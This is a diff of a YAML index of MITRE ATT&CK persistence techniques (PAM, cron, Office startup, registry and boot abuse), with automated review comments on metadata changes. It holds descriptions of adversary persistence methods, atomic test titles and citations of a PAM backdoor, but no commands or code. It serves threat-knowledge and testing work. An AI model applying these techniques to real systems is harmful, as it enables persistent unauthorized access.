- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -47937,20 +48289,57 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1574.007:
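Review bot: x_mitre_permissions_required: [root] is dropped from T1556.003 with no replacement; together with T1204.001 losing `User` while T1053.003 keeps `User` later in this diff, the treatment of this retired field is inconsistent, so settle on one. The re-added external_references also change order (PAM Creds now precedes Red Hat PAM and PAM Backdoor), which is harmless for citation lookup by source_name but makes the diff noisier than the actual content change.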
@@ -48040,7 +48429,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -48128,7 +48516,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests:
- name: Append malicious start-process cmdlet
@@ -48251,11 +48638,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -48333,7 +48719,6 @@ persistence:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests:
- name: Running Chrome VPN Extensions via the Registry 2 vpn extension
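Review bot: T1133 loses spec_version here but, unlike T1574.011 further down where the same removal is paired with adding x_mitre_attack_spec_version: 3.2.0 and x_mitre_modified_by_ref, nothing is added, and the surrounding context shows the object carries neither field; confirm T1133 is meant to end up with no ATT&CK spec version rather than being skipped by the generator.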
@@ -48412,7 +48797,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -48435,11 +48820,10 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -48497,9 +48881,8 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1542.001:
@@ -48580,7 +48963,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests:
- name: UEFI Persistence via Wpbbin.exe File Creation
@@ -48601,7 +48983,7 @@ persistence:
elevation_required: true
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -48620,7 +49002,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -48634,7 +49015,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -48661,8 +49041,8 @@ persistence:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -48693,7 +49073,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests:
- name: Service Registry Permissions Weakness
@@ -48809,11 +49190,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
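Review bot: the object closing at the top of this hunk keeps x_mitre_attack_spec_version: 3.1.0 and has no x_mitre_modified_by_ref, while sibling objects in this diff are bumped from 3.1.0 to 3.2.0 (T1569.002, T1053.007) and T1547.014 also stays at 3.1.0; if the regeneration is meant to reflect the current upstream bundle, the mixed 3.1.0/3.2.0 values are worth verifying against it rather than assumed to be upstream.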
@@ -48885,9 +49265,9 @@ persistence:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -48903,7 +49283,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests:
- name: Add a driver
@@ -48973,7 +49352,7 @@ persistence:
elevation_required: true
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -49048,7 +49427,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests:
- name: HKLM - Add atomic_test key to launch executable as part of user setup
@@ -49159,7 +49537,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -49183,8 +49561,6 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1543.003:
technique:
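Review bot: TFTP Boot loses both spec_version and x_mitre_attack_spec_version: 2.1.0 with nothing replacing them, so the object is left with no ATT&CK spec version at all; where the same field was removed from T1204.001 and T1556.003 in this diff it was re-added lower in the object as 3.2.0. Either re-add it here or confirm the upstream object genuinely has no value.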
@@ -49339,7 +49715,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests:
- name: Modify Fax service to run PowerShell
@@ -49551,26 +49926,7 @@ persistence:
elevation_required: true
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -49587,6 +49943,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -49597,9 +49954,13 @@ persistence:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -49607,17 +49968,37 @@ persistence:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1137:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:01:21.255Z'
+ name: Office Application Startup
+ description: |-
+ Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+ A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Nick Carr, Mandiant
- Microsoft Threat Intelligence Center (MSTIC)
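Review bot: `spec_version: '2.1'` is removed from T1053.003 and never re-added, while `x_mitre_attack_spec_version` goes from `2.1.0` to `3.2.0` and `revoked: false` and `x_mitre_remote_support: false` are new keys; if any consumer of this YAML reads the STIX `spec_version` key, the drop needs handling rather than silent removal. The `mitre-attack` reference entry also now lists `url` before `external_id`, harmless unless a downstream parser is positional.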
@@ -49625,74 +50006,68 @@ persistence:
- Praetorian
- Loic Jaquemet
- Ricardo Dias
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+ Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.4'
+ x_mitre_data_sources:
+ - 'File: File Creation'
+ - 'Application Log: Application Log Content'
+ - 'Windows Registry: Windows Registry Key Modification'
+ - 'File: File Modification'
+ - 'Module: Module Load'
+ - 'Process: Process Creation'
+ - 'Windows Registry: Windows Registry Key Creation'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
created: '2017-12-14T16:46:06.044Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137
url: https://attack.mitre.org/techniques/T1137
- - source_name: SensePost Ruler GitHub
- url: https://github.com/sensepost/ruler
- description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
- services. Retrieved February 4, 2019.'
+ external_id: T1137
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- source_name: TechNet O365 Outlook Rules
- url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
description: Koeller, B.. (2018, February 21). Defending Against Rules and
Forms Injection. Retrieved November 5, 2019.
+ url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
- source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: SensePost Ruler GitHub
+ description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+ services. Retrieved February 4, 2019.'
+ url: https://github.com/sensepost/ruler
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Office Application Startup
- description: |-
- Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
- A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- x_mitre_detection: |-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
- Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
- x_mitre_version: '1.3'
+ url: https://github.com/sensepost/notruler
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'File: File Creation'
- - 'Application Log: Application Log Content'
- - 'Windows Registry: Windows Registry Key Modification'
- - 'File: File Modification'
- - 'Module: Module Load'
- - 'Process: Process Creation'
- - 'Windows Registry: Windows Registry Key Creation'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1137
atomic_tests:
- name: Office Application Startup - Outlook as a C2
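Review bot: `x_mitre_permissions_required` (`User`, `Administrator`) is removed from the tail of T1137 with no counterpart added anywhere in the hunk, so unlike the surrounding key moves this is a genuine field drop; the platform entry `Office 365` is also replaced by `Office Suite`, and `x_mitre_version` moves from `'1.3'` to `'1.4'`. Any platform-keyed output derived from this file needs regenerating for the new label, and the commit message should call out the permissions field removal so it is not mistaken for reorder noise.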
@@ -49716,7 +50091,7 @@ persistence:
name: command_prompt
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -49746,6 +50121,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
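Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted mid-object here, directly after `kill_chain_phases`, while the same key is removed from the tail of T1098.003 in a later hunk and every other object in this diff keeps it near the end next to `object_marking_refs`; the net effect is a move rather than a duplicate, but the inconsistent placement suggests the generator is not sorting keys uniformly and is worth a look.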
@@ -49756,6 +50132,7 @@ persistence:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -49764,13 +50141,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
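Review bot: the platform list for T1098.003 loses `Office 365`, `Google Workspace` and `Azure AD` and gains `Office Suite` and `Identity Provider` (with `IaaS` and `SaaS` kept), and `x_mitre_version` moves from `'2.4'` to `'2.5'`. Anything keyed on the old platform names, such as per-platform index files, must be regenerated or mapped in the same change, otherwise the technique will no longer be listed under the old names.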
@@ -49812,9 +50189,6 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests: []
T1547.012:
@@ -49882,7 +50256,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
